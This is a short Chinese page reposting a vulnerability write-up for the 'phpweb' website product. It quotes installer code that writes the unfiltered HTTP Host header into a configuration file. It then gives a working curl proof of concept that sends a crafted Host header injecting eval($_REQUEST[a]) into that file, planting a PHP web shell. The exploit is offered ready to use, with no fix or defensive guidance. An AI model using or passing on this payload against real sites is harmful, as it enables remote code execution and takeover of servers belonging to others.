首页 > 代码库 > phpweb成品网站最新版(注入、上传、写shell)
phpweb成品网站最新版(注入、上传、写shell)
注入:
之所以鸡肋就是该漏洞利用安装文件 重新生成 配置文件 写入可执行代码
鸡肋1: 具有破坏性 动作非常大 重新写了配置文件 数据库连接文件
鸡肋2: 有一定安全常识的站长都会删掉 install 目录
虽然鸡肋 但也有优点 : 不受 magic_quotes_gpc 、 webserver 影响
分析:
$siteurl="http://".$_SERVER["HTTP_HOST"]."/"; //未过滤 $filestr = fread(fopen($SysConfigFile, ‘r‘),30000); $filestr=str_replace(" ","",$filestr); $filestr=str_replace("DefaultDbHost",$dbhost,$filestr); $filestr=str_replace("DefaultDbName",$dbname,$filestr); $filestr=str_replace("DefaultDbUser",$dbuser,$filestr); $filestr=str_replace("DefaultDbPass",$dbpwd,$filestr); $filestr=str_replace("DefaultsLan","zh_cn",$filestr); $filestr=str_replace("DefaultTablePre",$tablepre,$filestr); $filestr=str_replace("DefaultSiteUrl",$siteurl,$filestr); fwrite(fopen($ConFile,"w"),$filestr,30000);
$_SERVER["HTTP_HOST"] 就是 http head 中HOST传递过来的 可控制,并且不受 magic_quotes_gpc 影响 ^ _ ^
poc
curl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。